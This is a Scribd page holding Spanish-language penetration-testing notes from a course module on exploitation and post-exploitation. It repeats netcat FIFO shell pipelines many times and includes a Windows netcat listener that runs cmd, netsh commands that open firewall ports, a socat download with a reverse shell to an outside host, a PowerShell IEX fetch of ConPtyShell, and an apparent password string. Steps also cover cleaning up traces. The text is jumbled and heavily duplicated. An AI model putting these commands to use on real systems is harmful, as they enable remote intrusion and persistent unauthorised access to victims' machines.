0% encontró este documento útil (0 votos)
64 vistas5 páginas

Explotación de ACDSee FotoSlate 6996

El documento contiene instrucciones para establecer una conexión de shell remota mediante netcat (nc) entre una máquina atacante y una máquina objetivo, incluyendo los comandos para crear un archivo FIFO, ejecutar un shell interactivo y transmitirlo a través de nc, y borrar el archivo una vez finalizada la conexión. También incluye otras instrucciones para instalar herramientas de hacking como SSHPry y ConPtyShell para obtener shells remotas.
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como TXT, PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
64 vistas5 páginas

Explotación de ACDSee FotoSlate 6996

El documento contiene instrucciones para establecer una conexión de shell remota mediante netcat (nc) entre una máquina atacante y una máquina objetivo, incluyendo los comandos para crear un archivo FIFO, ejecutar un shell interactivo y transmitirlo a través de nc, y borrar el archivo una vez finalizada la conexión. También incluye otras instrucciones para instalar herramientas de hacking como SSHPry y ConPtyShell para obtener shells remotas.
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como TXT, PDF, TXT o lee en línea desde Scribd

75 exploit/windows/fileformat/acdsee_fotoslate_string 2011-09-12

good No ACDSee FotoSlate PLP File id Parameter Overflow

rm –f /tmp/f; mkfifo /tmp/f

rm –f /tmp/f; mkfifo /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f;

cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f;


nc –nv [Link] 6996

cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996 >/tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996 >/tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc –l [ip objetivo] 6996 > /tmp/f

sudo cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 6996> /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 6996 > /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 21> /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f

nc

K4l1$1973

nc –nv [Link] 21

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 8787> /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 4444> /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 514> /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 514> /tmp/f

nc –lvpn [Link] 6996

XXXXXXXXXXXXXXXXXXXXX

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f


nc -nv [Link] 521

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 514> /tmp/f

XXXXXXXXXXXXXXXXXXXXXXXXXXX

apt-get install nc

rm –f /tmp/f; mkfifo /tmp/f
• se ejecuta un /bin/sh en el lado de la máquina objetivo y se transmite una shell
al atacante:
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f

• Para realizar la conexión con la máquina objetivo se debe ejecutar desde una
terminal de la máquina atacante el siguiente comando:
nc –nv [Link] 6996

• Finalmente no se debe olvidar borrar el archivo creado inicialmente en la máquina


objetivo:
rm –f /tmp/f

cat /tmp/f|/bin/sh -i 2>&1|nc [Link] 6996 >/tmp/f


C:\Windows\System32\[Link] –Ldp 31338 –vv –e [Link]

xxxxxxxxxxxxxxxxxxxx

vmware:

[Link]

xxxxxxxxxxxxxxxxxx

LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6

xxxxxxxxxxxxxxxxxxx

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f

nc -nv [Link] 521

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f

XXXXXXXXXXXXXXXXXXXXXXXXXXX
apt-get install nc

rm –f /tmp/f; mkfifo /tmp/f
• se ejecuta un /bin/sh en el lado de la máquina objetivo y se transmite una shell
al atacante:
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f

• Para realizar la conexión con la máquina objetivo se debe ejecutar desde una
terminal de la máquina atacante el siguiente comando:
nc –nv [Link] 6996

• Finalmente no se debe olvidar borrar el archivo creado inicialmente en la máquina


objetivo:
rm –f /tmp/f

C:\Windows\System32\[Link] –Ldp 31338 –vv –e [Link]

netsh firewall show opmode


netsh firewall add portopening TCP 31338 ”Prueba Netcat” ENABLE ALL
netsh advfirewall firewall add rule name=“Servicio Netcat” protocol=tcp
LocalPort=31338 dir=in enable=yes action=allow profile=Private

K4l1$1973

XXXXXXXXXXXXXXXXXXXXXX

git clone [Link]

rm –SSHPry2.0 /root/SSHPry2.0

[Link]

python [Link] --list

cd SSHPry2.0/

sudo /etc/init.d/ssh start

tail -f [Link]

chmod +x [Link]

git clone [Link]

xxxxxxxxxxxxxxxxxx

uname -v
SHA256sum
649d35f610205828a08c86d862dc6e660dced6553e55f62acf59d57643c5031f

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

exit

passwd

sudo passwd root

sudo adduser gesmass

pwd
/home/kali

ls
gesmass kali

cd home/kali

sudo usermod -aG sudo gesmass

sudo apt-get install terminator

terminator

sudo apt-get install git

sudo apt-get install python3-pip

sudo pip install

ls
code_1.67.1-1651841865_amd64.deb

sudo apt install geany

geany

sudo apt install -y htop

htop

sudo apt install neofetch

neofetch

┌──(kali㉿kali)-[~/Downloads]
└─$ ls
code_1.67.1-1651841865_amd64.deb nordvpn-release_1.0.0_all.deb
sudo apt-get install ./nordvpn-release_1.0.0_all.deb

sudo apt-get update

sudo apt-get install nordvpn -y

sudo nordvpn settings

kali-tweaks

XXXXXXXXXXXXXXXXXXXXX

nc -lnvp 6996

stty raw -echo; (stty size; cat) | nc -lvnp 87

ConPtyShell [direccion de ip] [puerto]

user@victim$ wget -q
[Link]
-O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -
li',pty,stderr,setsid,sigint,sane tcp:[Link]:4242

IEX(IWR [Link]
ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [Link] 87

cherrytree
sudo apt install ./code_1.67.1-1651841865_amd64.deb

M3A5. Explotación y Post-explotación de Vulnerabilidades

[Link]
utm_content=DAFA6Q5eLkY&utm_campaign=designshare&utm_medium=link2&utm_source=shareb
utton

También podría gustarte